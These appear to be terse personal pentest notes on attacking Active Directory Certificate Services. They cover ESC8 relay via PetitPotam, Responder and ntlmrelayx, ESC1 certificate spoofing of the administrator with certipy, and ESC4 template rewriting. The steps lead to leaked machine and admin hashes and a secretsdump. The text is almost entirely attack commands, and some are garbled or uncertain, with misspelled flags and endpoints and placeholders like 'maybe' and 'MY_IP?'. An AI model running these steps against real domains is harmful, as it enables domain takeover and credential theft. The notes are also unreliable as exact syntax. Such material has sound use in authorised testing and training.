1. ESC8
   1. Check DC is vulnerable to PetitPotam, meaning:
      1. Web Enrollment is enabled
         1. certipy find -u USER -dc-ip IP -p PASS
         2. Showing vulnerabilities (ESC8)
      2. Servers accept NTLM authentications (classic AD)
   2. Run Responder
   3. Use PetitPotam on DC to authenticate to the Responder
   4. Machine hash gets leaked, can either crack or relay
   5. FOR RELAYING:
      1. ntlmrelayx -t http://CERTIFICATE_SERVER_IP/certsrv/certgnsh.asp -smb2sipport —adcs —template Domain Controller
         1. Get the certificate server IP by running certutil.exe
      2. Use PetitPotam
      3. Certificate gets leaked in ntlmrelayx
      4. Request for a ticket with gettgtpkinit.py -pfx-base64 $(cat b64-cert) ‘DOMAIN’/’DCNAME$’ ‘ticket.ccache’
      5. Use ccache for secretsdump
2. ESC1: When you can request for a certificate by giving another name (usually to spoof the administrator)
   1. Check ESC1 is present and Domain Users have enrollment rights:
      1. certipy find -dc-ip IP -u USER -p PASS
   2. Request for a cert as the admin
      1. certipy req -username [email protected](maybe) -password 'BadPass!' -ca 'DC-NAME-AFAIK' -template 'TestUser' -upn [email protected](maybe) -debug -dc-ip IP -target MY_IP?
      2. Get administrator_dc.pfx
   3. Use it to leak the admin hash
      1. certipy auth -dc-ip IP -pfx administrator_dc.pfx
3. ESC4: Rewrite template to make it vulnerable - A chain to go from ESC4 to ESC1
   1. Find that the dc is vulnerable to ESC4
      1. certipy find -u USER -dc-ip IP -p PASS -text -output original
   2. Update existing template to enable ESC1 and save the original one
      1. certipy template -dc-ip IP -username USER -template 'Existing_Template' -save-old -p PASS
   3. Carry on with ESC4
      1. Use certipy to verify
4. ESC3: Template has high privs and can make you elevate your privs